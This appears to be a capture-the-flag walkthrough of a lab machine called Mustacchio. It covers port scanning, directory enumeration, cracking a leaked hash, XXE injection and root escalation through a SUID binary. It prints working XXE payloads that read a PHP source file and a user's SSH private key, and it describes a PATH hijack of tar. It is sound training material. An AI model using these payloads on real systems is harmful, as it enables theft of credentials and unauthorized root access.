Intro

This machine provides a great opportunity for beginners to practice and develop fundamental skills. It covers various aspects such as port scanning, web directory enumeration, exploiting vulnerabilities like XXE, privilege escalation, and more. By working on this machine, beginners can gain hands-on experience and build a solid foundation in penetration testing and cybersecurity.

0x00 Recon

First, lets use rustscan for scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
rustscan -a 10.10.219.48

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.219.48:22
Open 10.10.219.48:80
Open 10.10.219.48:8765

…uhmm 22 80 8765 running
After encountering an unfamiliar port 8765, we decided to perform another scan using nmap.

1
sudo nmap -Pn -sC -sV -A -O 10.10.219.48 -p 22,80,8765
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
|   256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_  256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
|_http-server-header: nginx/1.10.3 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Lets take a look at ports 80 and 8765,both of which are HTTP

After further investigation, it was determined that port 80 hosts a static website, while port 8765 features a login page.
So lets start gathering information to see if we can obtain the password for the login page
Lets use dirsearch for directory scanning.

1
dirsearch -u http://10.10.170.57

After performing the directory scanning, we noticed a directory named “custom” that appears to be SUSpicious.

Inside the “custom” directory, we discovered a file named “users.bak,” which raises further suspicion.
so lets dowload it then try cat & strings it

It appears that the content of the “users.bak” file is in the form of a hash.
when encountering a hash, i often use “crackstation.net” for cracking.

Niccccce next, lets try log in and see what we can discover.

Great!!, we have successfully logged in.
Upon seeing this page, it seems there is a potential for Remote Code Execution (RCE).
Lets first check if this functionality allows us to inject PHP code for RCE.
After submitting, lets examine the packet.

He is sending XML as the input.

At this point, lets change our approach and try XXE (XML External Entity) injection.

0x01 XXE

It seems to be successful.

Lets explore around and then examine the source code of the current page.

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/convert.base64-encode/resource=/var/www/nginx/home.php"> ]>
	<root>
		<name>&ent;</name>
	</root>

we discover a comment stating that “barry” can use SSH.

Lets gamble and see if the current user’s privileges allow us to access Barrys id_rsa 

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/convert.base64-encode/resource=/home/barry/.ssh/id_rsa"> ]>
	<root>
		<name>&ent;</name>
	</root>

nice we got it

Lets use ssh2john to convert the SSH private key file (id_rsa) into a format that can be cracked by john the ripper.

Finally we successfully managed to log in to SSH using Barrys credentials.

0x02 Privilege Escalation

we can get the user flag in barry home directory

Lets first examine the available permissions and SUID privileges that we can utilize
then we can observe that /home/joe/live_log is an SUID file that we haven’t explored yet
…so wetry to cat & string it

1
cat /home/joe/live_log

then we can observe tar -f in /home/joe/live_log

So we can create a tar file and modify the environment variables to make live_log execute our tar
Finally, lets execute it and obtain the root.txt under the root